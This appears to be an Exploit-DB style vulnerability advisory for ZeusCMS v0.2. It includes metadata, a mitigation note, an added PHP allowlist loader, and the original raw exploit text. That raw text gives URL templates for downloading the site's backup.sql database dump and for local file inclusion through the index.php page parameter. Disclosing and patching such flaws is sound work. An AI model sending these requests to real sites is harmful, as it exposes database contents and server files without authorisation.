Vendor: ZeusCMS
By: ViRuSMaN
CVSS: 7.5 (HIGH)
Title: Database Backup Dump and Local File Include
CWE: 94, 98
Product Name: ZeusCMS
Affected Version From: v0.2
Affected Version To: v0.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

ZeusCMS v0.2 (DBD/LFI) Multiple Vulnerabilities

ZeusCMS is yet another Content Management System; version 0.2 is vulnerable to a Database Backup Dump and a Local File Include. An attacker can download the database backup file (backup.sql) directly from the target website and can include arbitrary local files through the page parameter of index.php.

Mitigation:

Input validation should be applied to prevent SQL injection and Local File Inclusion attacks, and access to the backup.sql file should be restricted.
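As an added example (not ZeusCMS code), the following PHP page loader implements the input validation described above with an allowlist: the requested page name is only ever used as an array key, so it never reaches the filesystem. The page names, PAGE_MAP and the pages/ directory are hypothetical.

```php
<?php
// Added example, not ZeusCMS code: allowlist-based page loader that replaces
// passing a user-controlled ?page= value straight into include().
declare(strict_types=1);

// Hypothetical page map: request key => template file under a fixed directory.
const PAGE_MAP = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];
const PAGE_DIR = __DIR__ . '/pages';

/**
 * Map the untrusted ?page= value to a known template, or return null if it
 * is not in the allowlist. Because the request value is used only as an
 * array key, traversal sequences, null bytes or stream wrappers are rejected
 * before any path is built.
 */
function resolvePage(?string $requested): ?string
{
    if ($requested === null || $requested === '') {
        $requested = 'home';                  // default page
    }
    if (!array_key_exists($requested, PAGE_MAP)) {
        return null;                          // not an allowlisted page
    }
    $path = PAGE_DIR . '/' . PAGE_MAP[$requested];

    // Defence in depth: the resolved file must still lie inside PAGE_DIR.
    $real = realpath($path);
    $base = realpath(PAGE_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

$page = resolvePage($_GET['page'] ?? null);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
require $page;
```

Requests such as index.php?page=news resolve to pages/news.php, while any value outside PAGE_MAP, including traversal strings or wrapper URLs, gets a 404 without touching the filesystem.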

Exploit-DB raw data:

==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] ZeusCMS v0.2 (DBD/LFI) Multiple Vulnerabilities
==============================================================================

    [»] Script:             [ ZeusCMS ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ ZeusCMS is yet another Content Management System ]
    [»] Download:           [ http://sourceforge.net/projects/zeuscms/files/ZeusCMS%20v0.2/ ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Database Backup Dump ]===

    [»] http://[target].com/[path]/admin/backup.sql


===[ Local File Include ]===

    [»] http://[target].com/[path]/index.php?page=[LFI]


Author: ViRuSMaN <-

###########################################################################